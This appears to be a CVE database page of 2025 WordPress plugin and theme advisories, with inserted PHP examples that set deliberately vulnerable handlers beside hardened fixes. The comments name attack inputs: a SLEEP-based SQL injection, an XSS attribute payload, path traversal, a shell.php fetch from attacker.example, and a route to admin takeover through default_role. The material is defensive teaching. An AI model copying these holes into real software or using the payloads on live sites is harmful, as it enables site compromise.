Live Vulnerability Intelligence

Threat Database

Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.

Total 15,036 | Critical 923 | High 3,047 | Medium 10,866
Showing 5101-5120 of 15036 records
Threat Entry Updated 2025-05-12

CVE-2025-2168 - Ultimate Store Kit Plugin

The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1. This is due to missing or incorrect nonce validation on the dismiss() function. This makes it possible for unauthenticated attackers to set arbitrary user meta values to `1`, which can be leveraged to lock an administrator out of their site via a forged request, granted they can trick a site administrator into performing an…

PLUGIN Ultimate Store Kit

CVE-2025-2168

MEDIUM CVSS 4.3 2025-05-01
Threat Entry Updated 2025-05-06

CVE-2025-1305 - NewsBlogger Theme

The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.5.4. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. This makes it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

THEME NewsBlogger

CVE-2025-1305

HIGH CVSS 8.8 2025-05-01
Threat Entry Updated 2025-05-06

CVE-2025-1304 - NewsBlogger Theme

The NewsBlogger theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the newsblogger_install_and_activate_plugin() function in all versions up to, and including, 0.2.5.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

THEME NewsBlogger

CVE-2025-1304

HIGH CVSS 8.8 2025-05-01
Threat Entry Updated 2025-05-12

CVE-2025-2816 - Page View Count Plugin

The Page View Count plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the yellow_message_dontshow() function in versions 2.8.0 to 2.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to one on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true…

PLUGIN Page View Count

CVE-2025-2816

HIGH CVSS 8.1 2025-05-01
Threat Entry Updated 2025-05-02

CVE-2025-2890 - Tagdiv Opt In Builder Plugin

The tagDiv Opt-In Builder plugin for WordPress is vulnerable to time-based SQL Injection via the ‘subscriptionCouponId’ parameter in all versions up to, and including, 1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

PLUGIN Tagdiv Opt In Builder

CVE-2025-2890

MEDIUM CVSS 6.5 2025-04-30
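The tagDiv entry above names the two halves of a WordPress SQL injection: no escaping of the user-supplied value and a query that is never passed through `$wpdb->prepare()`. The PHP below is an added illustration, not the plugin's code; the handler names, the `td_subscriptions` table and the capability used are assumptions.

```php
<?php
// Added example (not from the tagDiv plugin): a time-based SQL injection
// pattern in a WordPress AJAX handler, and the prepared-statement fix.
// Handler names, the td_subscriptions table and the capability are hypothetical.

// VULNERABLE: the raw parameter is concatenated into the query. A request with
// subscriptionCouponId=1 AND SLEEP(5) makes the database pause for 5 seconds,
// which is exactly the signal a blind/time-based injection test looks for;
// the same position then accepts conditional sub-selects to read other tables.
function td_lookup_subscription_vulnerable() {
    global $wpdb;
    $coupon = $_POST['subscriptionCouponId'];
    $sql    = "SELECT id, user_id FROM {$wpdb->prefix}td_subscriptions WHERE coupon_id = " . $coupon;
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// FIXED: authenticate the request, then bind the value through $wpdb->prepare(),
// which quotes and escapes it; %d additionally coerces it to an integer.
function td_lookup_subscription_fixed() {
    global $wpdb;
    check_ajax_referer( 'td_lookup_subscription', 'nonce' );
    if ( ! current_user_can( 'read' ) ) {       // use the capability the feature really needs
        wp_send_json_error( 'forbidden', 403 );
    }
    $coupon = absint( $_POST['subscriptionCouponId'] ?? 0 );
    $sql    = $wpdb->prepare(
        "SELECT id, user_id FROM {$wpdb->prefix}td_subscriptions WHERE coupon_id = %d",
        $coupon
    );
    // For string columns use %s. For LIKE patterns escape the wildcards first:
    //   $wpdb->prepare( "... WHERE code LIKE %s", $wpdb->esc_like( $code ) . '%' )
    wp_send_json_success( $wpdb->get_results( $sql ) );
}
add_action( 'wp_ajax_td_lookup_subscription', 'td_lookup_subscription_fixed' );
```

Table and column names cannot be bound as placeholders; they must come from constants or an allowlist, never from the request.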
Threat Entry Updated 2025-05-02

CVE-2025-3953 - WP Statistics Plugin

The WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'optionUpdater' function in all versions up to, and including, 14.13.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin settings.

PLUGIN WP Statistics

CVE-2025-3953

MEDIUM CVSS 6.5 2025-04-30
Threat Entry Updated 2025-05-09

CVE-2025-3471 - SureForms Plugin

The SureForms WordPress plugin before 1.4.4 does not have a proper authorisation check when updating its settings via the REST API, which could allow Contributor and above roles to perform such an action.

PLUGIN SureForms

CVE-2025-3471

MEDIUM CVSS 4.9 2025-04-30
Threat Entry Updated 2025-05-06

CVE-2025-3452 - Secupress Plugin

The SecuPress Free — WordPress Security plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'secupress_reinstall_plugins_admin_ajax_cb' function in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins.

PLUGIN Secupress

CVE-2025-3452

MEDIUM CVSS 4.3 2025-04-29
Threat Entry Updated 2025-05-06

CVE-2025-2893 - Gutenverse Plugin

The Gutenverse – Ultimate Block Addons and Page Builder for Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's countdown Block in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

PLUGIN Gutenverse

CVE-2025-2893

MEDIUM CVSS 6.4 2025-04-29
Threat Entry Updated 2025-04-29

CVE-2024-12273 - Calculated Fields Form Plugin

The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

PLUGIN Calculated Fields Form

CVE-2024-12273

LOW CVSS 3.5 2025-04-29
Threat Entry Updated 2025-04-30

CVE-2025-0627 - WordPress Tag, Category, and Taxonomy Manager Plugin

The WordPress Tag, Category, and Taxonomy Manager WordPress plugin before 3.30.0 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

PLUGIN WordPress Tag, Category, and Taxonomy Manager

CVE-2025-0627

LOW CVSS 3.5 2025-04-28
Threat Entry Updated 2025-04-29

CVE-2024-9771 - WP-Recall Plugin

The WP-Recall WordPress plugin before 16.26.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

PLUGIN WP-Recall

CVE-2024-9771

LOW CVSS 3.5 2025-04-28
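The three "does not sanitise and escape some of its settings" entries above (Calculated Fields Form, the Tag/Category/Taxonomy Manager and WP-Recall) share one root cause: a settings value is stored raw and printed raw, so a user who lacks `unfiltered_html` (every administrator on multisite unless it is granted explicitly) can still persist a script. The PHP below is an added example, not code from any of those plugins; the option name `myplugin_settings` and its field names are assumptions.

```php
<?php
// Added example (not from the plugins above): a plugin setting stored and
// rendered without sanitisation or escaping, and the corrected version.
// Option name `myplugin_settings` and the field names are hypothetical.

// VULNERABLE: whatever the form posts is written to the option and echoed back
// inside an attribute and as HTML. A label value such as
//   " autofocus onfocus="alert(document.domain)
// is a stored XSS for every user who opens the page. Core's kses filtering
// never sees it because the plugin writes the option itself.
function myplugin_save_settings_vulnerable() {
    update_option( 'myplugin_settings', wp_unslash( $_POST['myplugin'] ) );
}
function myplugin_render_settings_vulnerable() {
    $s = get_option( 'myplugin_settings', array() );
    echo '<input name="myplugin[label]" value="' . $s['label'] . '">';
    echo '<div class="intro">' . $s['intro'] . '</div>';
}

// FIXED: register the option with a sanitize_callback (runs on every save,
// including the Settings API path) and escape for the exact output context.
function myplugin_sanitize_settings( $input ) {
    $clean = array();
    // plain-text field: tags and control characters stripped
    $clean['label'] = sanitize_text_field( $input['label'] ?? '' );
    // rich-text field: reduced to post-safe HTML regardless of who saved it.
    // Do not branch on current_user_can( 'unfiltered_html' ) here: the advisory
    // class above exists because multisite admins lack that capability and a
    // plugin must not hand it back through its own settings.
    $clean['intro']     = wp_kses_post( $input['intro'] ?? '' );
    $clean['max_items'] = absint( $input['max_items'] ?? 10 );
    return $clean;
}
add_action( 'admin_init', function () {
    register_setting( 'myplugin', 'myplugin_settings', array(
        'type'              => 'array',
        'sanitize_callback' => 'myplugin_sanitize_settings',
    ) );
} );
function myplugin_render_settings_fixed() {
    $s = get_option( 'myplugin_settings', array() );
    echo '<input name="myplugin[label]" value="' . esc_attr( $s['label'] ?? '' ) . '">';
    echo '<div class="intro">' . wp_kses_post( $s['intro'] ?? '' ) . '</div>';   // filter on output too
    echo '<span>' . esc_html( (string) ( $s['max_items'] ?? 10 ) ) . '</span>';
}
```

Escaping is chosen by sink, not by source: `esc_attr()` inside attributes, `esc_html()` in text nodes, `esc_url()` in `href`/`src`, and `wp_kses_post()` only where HTML is genuinely intended.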
Threat Entry Updated 2025-05-14

CVE-2024-13688 - Admin and Site Enhancements (ASE) Plugin

The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 uses a hardcoded password in its Password Protection feature, allowing attackers to bypass the protection via a crafted request.

PLUGIN Admin and Site Enhancements (ASE)

CVE-2024-13688

MEDIUM CVSS 5.3 2025-04-28
Threat Entry Updated 2025-04-29

CVE-2025-2101 - Edumall Theme

The Edumall theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.4 via the 'template' parameter of the 'edumall_lazy_load_template' AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.

THEME Edumall

CVE-2025-2101

HIGH CVSS 8.1 2025-04-26
Threat Entry Updated 2025-04-29

CVE-2024-13812 - Anps Theme Plugin

The Anps Theme plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

PLUGIN Anps Theme

CVE-2024-13812

MEDIUM CVSS 6.5 2025-04-26
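The Edumall (CVE-2025-2101) and Anps (CVE-2024-13812) entries above are both unauthenticated AJAX actions that pass a request value straight into a dangerous sink: `include` for the 'template' parameter (Local File Inclusion) and `do_shortcode()` for arbitrary shortcode execution. The PHP below is an added example, not code from either product; the action names, the `templates/` directory layout and the shortcode allowlist are assumptions.

```php
<?php
// Added example (not from Edumall or Anps): two AJAX actions that feed request
// data into include() and do_shortcode(), each followed by a hardened version.
// Action names, directory layout and the shortcode allowlist are hypothetical.

// VULNERABLE 1: Local File Inclusion. The appended ".php" is the only
// constraint, so template=../../../../some/uploaded/file reaches any .php
// file on disk, and a previously uploaded file then runs as the web server.
function theme_lazy_load_template_vulnerable() {
    $template = $_POST['template'];
    include get_template_directory() . '/templates/' . $template . '.php';
    wp_die();
}

// FIXED 1: the request selects a template only by a key in a fixed map, and
// the resolved path is still checked to lie inside the templates directory.
function theme_lazy_load_template_fixed() {
    check_ajax_referer( 'theme_lazy_load', 'nonce' );
    $templates = array(                       // hypothetical allowlist
        'course-card' => 'course-card.php',
        'course-list' => 'course-list.php',
    );
    $key = sanitize_key( wp_unslash( $_POST['template'] ?? '' ) );
    if ( ! isset( $templates[ $key ] ) ) {
        wp_send_json_error( 'unknown template', 400 );
    }
    $base = realpath( get_template_directory() . '/templates' );
    $path = realpath( $base . '/' . $templates[ $key ] );
    // belt and braces: refuse anything that resolves outside $base
    if ( false === $path || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid template', 400 );
    }
    include $path;
    wp_die();
}
add_action( 'wp_ajax_theme_lazy_load_template',        'theme_lazy_load_template_fixed' );
add_action( 'wp_ajax_nopriv_theme_lazy_load_template', 'theme_lazy_load_template_fixed' );

// VULNERABLE 2: arbitrary shortcode execution. Every registered shortcode on
// the site runs, including ones from other plugins that were never meant to
// be reachable by anonymous visitors with attacker-chosen attributes.
function theme_render_shortcode_vulnerable() {
    echo do_shortcode( wp_unslash( $_POST['shortcode'] ) );
    wp_die();
}

// FIXED 2: the client names a tag from an allowlist and sends attributes as
// separate fields; the shortcode string itself is built server-side.
function theme_render_shortcode_fixed() {
    check_ajax_referer( 'theme_render_shortcode', 'nonce' );
    $allowed = array( 'theme_gallery', 'theme_team' );   // hypothetical tags
    $tag     = sanitize_key( wp_unslash( $_POST['tag'] ?? '' ) );
    if ( ! in_array( $tag, $allowed, true ) || ! shortcode_exists( $tag ) ) {
        wp_send_json_error( 'shortcode not allowed', 400 );
    }
    $atts = '';
    foreach ( (array) ( $_POST['atts'] ?? array() ) as $name => $value ) {
        $name  = sanitize_key( $name );
        $value = sanitize_text_field( wp_unslash( $value ) );
        $atts .= sprintf( ' %s="%s"', $name, esc_attr( $value ) );
    }
    echo do_shortcode( '[' . $tag . $atts . ']' );
    wp_die();
}
add_action( 'wp_ajax_theme_render_shortcode',        'theme_render_shortcode_fixed' );
add_action( 'wp_ajax_nopriv_theme_render_shortcode', 'theme_render_shortcode_fixed' );
```

For the `nopriv` hooks the nonce is minted for logged-out visitors, so it limits cross-site forgery rather than access; the allowlists are what actually remove the attacker's choice of file and shortcode.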
Threat Entry Updated 2025-05-14

CVE-2025-2907 - Order Delivery Date Plugin

The Order Delivery Date WordPress plugin before 12.3.1 does not have authorization and CSRF checks when importing settings. Furthermore, it lacks checks restricting the import to options that belong to the plugin itself. This allows attackers to set default_user_role to administrator and enable users_can_register, and then register as an administrator of the site for complete site takeover.

PLUGIN Order Delivery Date

CVE-2025-2907

CRITICAL CVSS 9.8 2025-04-26
Threat Entry Updated 2025-05-06

CVE-2025-3914 - Aeropage Sync For Airtable Plugin

The Aeropage Sync for Airtable plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aeropage_media_downloader' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

PLUGIN Aeropage Sync For Airtable

CVE-2025-3914

HIGH CVSS 8.8 2025-04-26
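CVE-2025-3914 above (and CVE-2025-1304 earlier on this page) describe uploads that never check the file type, so a PHP file lands in a web-reachable directory. The PHP below is an added example, not Aeropage's code; the "fetch a remote URL into the media library" flow, the handler names and the MIME allowlist are assumptions.

```php
<?php
// Added example (not from the Aeropage plugin): a "download this URL into the
// media library" handler without file-type validation, then a hardened one.
// Handler names and the MIME allowlist are hypothetical.

// VULNERABLE: fetches whatever the caller names and writes it under uploads/
// with the original filename. url=https://attacker.example/shell.php yields a
// web-reachable PHP file. No capability check, no nonce, no type check.
function media_downloader_vulnerable() {
    $url  = $_POST['url'];
    $dest = wp_upload_dir()['basedir'] . '/' . basename( $url );
    file_put_contents( $dest, file_get_contents( $url ) );
    wp_send_json_success( $dest );
}

// FIXED: authorise, validate the URL, fetch to a temp file, verify extension
// AND real content type against an allowlist, then let WordPress place it.
function media_downloader_fixed() {
    check_ajax_referer( 'media_downloader', 'nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $url = esc_url_raw( wp_unslash( $_POST['url'] ?? '' ) );
    if ( ! wp_http_validate_url( $url ) ) {           // also rejects local/private hosts
        wp_send_json_error( 'invalid url', 400 );
    }
    $tmp = download_url( $url, 15 );
    if ( is_wp_error( $tmp ) ) {
        wp_send_json_error( $tmp->get_error_message(), 502 );
    }
    $name  = sanitize_file_name( basename( (string) parse_url( $url, PHP_URL_PATH ) ) );
    $mimes = array(                                     // hypothetical allowlist
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'webp'     => 'image/webp',
    );
    // wp_check_filetype_and_ext() pairs the extension check with a content
    // sniff, so shell.php renamed to shell.png comes back with ext/type false.
    $check = wp_check_filetype_and_ext( $tmp, $name, $mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        @unlink( $tmp );
        wp_send_json_error( 'file type not allowed', 415 );
    }
    $file = array(
        'name'     => $check['proper_filename'] ? $check['proper_filename'] : $name,
        'tmp_name' => $tmp,
    );
    $attachment_id = media_handle_sideload( $file, 0 );   // runs core's upload checks again
    if ( is_wp_error( $attachment_id ) ) {
        @unlink( $tmp );
        wp_send_json_error( $attachment_id->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'attachment_id' => $attachment_id ) );
}
add_action( 'wp_ajax_media_downloader', 'media_downloader_fixed' );
```

Keeping the allowlist short and handing the final write to `media_handle_sideload()` means the file is renamed, registered as an attachment and subject to core's own MIME policy rather than to whatever the remote server served.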
Threat Entry Updated 2025-04-29

CVE-2025-3906 - Integração entre Eduzz e Woocommerce Plugin

The Integração entre Eduzz e Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wep_opcoes' function in all versions up to, and including, 1.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the default registration role within the plugin's registration flow to Administrator, which allows any user to create an Administrator account.

PLUGIN Integração entre Eduzz e Woocommerce

CVE-2025-3906

HIGH CVSS 8.8 2025-04-26
Threat Entry Updated 2025-04-29

CVE-2025-3491 - Add Custom Page Template Plugin

The Add custom page template plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'acpt_validate_setting' function. This is due to insufficient sanitization of the 'template_name' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.

PLUGIN Add Custom Page Template

CVE-2025-3491

HIGH CVSS 7.2 2025-04-26
Threat Entry Updated 2025-05-06

CVE-2025-3915 - Aeropage Sync For Airtable Plugin

The Aeropage Sync for Airtable plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'aeropageDeletePost' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.

PLUGIN Aeropage Sync For Airtable

CVE-2025-3915

MEDIUM CVSS 4.3 2025-04-26
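Most entries on this page (CVE-2025-2168, -1305, -1304, -2816, -3953, -3452, -2907, -3906 and -3915) reduce to one or two missing lines in an admin-ajax or settings handler: `check_ajax_referer()` for the anti-CSRF nonce and `current_user_can()` for the capability, plus, in the settings-import cases, a handler that writes any option name it is handed, including the core registration options. The PHP below is an added example, not code from any of those plugins; the action names, the `myplugin_` option prefix and the meta key list are assumptions.

```php
<?php
// Added example (not from any plugin listed above): the missing nonce,
// capability and allowlist checks behind the "unauthorized modification of
// data" entries. Action names, the myplugin_ prefix and meta keys are hypothetical.

// VULNERABLE: reachable by logged-out users (nopriv), no nonce, no capability
// check, and the option and meta keys come straight from the request.
//  - an anonymous POST can set any user meta key to 1 (the CVE-2025-2168 shape);
//  - a subscriber can write core options such as users_can_register=1 and
//    default_role=administrator, then simply register as an administrator
//    (the CVE-2025-2907 / CVE-2025-3906 shape).
add_action( 'wp_ajax_myplugin_import',        'myplugin_import_vulnerable' );
add_action( 'wp_ajax_nopriv_myplugin_import', 'myplugin_import_vulnerable' );
function myplugin_import_vulnerable() {
    foreach ( (array) $_POST['options'] as $name => $value ) {
        update_option( $name, $value );
    }
    update_user_meta( get_current_user_id(), $_POST['meta_key'], 1 );
    wp_send_json_success();
}

// FIXED. Three independent controls, each stopping a different attacker:
//  1. check_ajax_referer(): a forged cross-site request carries no valid nonce,
//     so a tricked administrator's browser cannot be used (CSRF).
//  2. current_user_can( 'manage_options' ): a subscriber who reads a nonce out
//     of the page source is still refused (authorisation).
//  3. an allowlist of option and meta keys: even an administrator's import
//     cannot reach core options, and each value is sanitised for its key.
add_action( 'wp_ajax_myplugin_import', 'myplugin_import_fixed' );   // no nopriv hook
function myplugin_import_fixed() {
    check_ajax_referer( 'myplugin_import', 'nonce' );          // 1. dies with 403 on failure
    if ( ! current_user_can( 'manage_options' ) ) {           // 2.
        wp_send_json_error( 'forbidden', 403 );
    }
    $allowed_options = array(                                  // 3. hypothetical keys
        'myplugin_delivery_days' => 'absint',
        'myplugin_cutoff_time'   => 'sanitize_text_field',
        'myplugin_enabled'       => 'rest_sanitize_boolean',
    );
    foreach ( (array) ( $_POST['options'] ?? array() ) as $name => $value ) {
        $name = sanitize_key( $name );
        if ( ! isset( $allowed_options[ $name ] ) ) {
            continue;   // default_role, users_can_register, admin_email ... never get here
        }
        $sanitize = $allowed_options[ $name ];
        update_option( $name, $sanitize( wp_unslash( $value ) ) );
    }
    $allowed_meta = array( 'myplugin_notice_dismissed' );
    $meta_key     = sanitize_key( wp_unslash( $_POST['meta_key'] ?? '' ) );
    if ( in_array( $meta_key, $allowed_meta, true ) ) {
        update_user_meta( get_current_user_id(), $meta_key, 1 );
    }
    wp_send_json_success();
}

// The nonce the fixed handler expects is minted server-side on the page that
// issues the request, e.g. as a hidden field:
//   wp_nonce_field( 'myplugin_import', 'nonce' );
// or handed to the admin script:
//   wp_localize_script( 'myplugin-admin', 'myplugin', array(
//       'ajax_url' => admin_url( 'admin-ajax.php' ),
//       'nonce'    => wp_create_nonce( 'myplugin_import' ),
//   ) );
```

A nonce is not an authorisation check and a capability check is not CSRF protection; the entries above that are rated as CSRF lack the first, the "missing capability check" entries lack the second, and the site-takeover ones lack the third control as well.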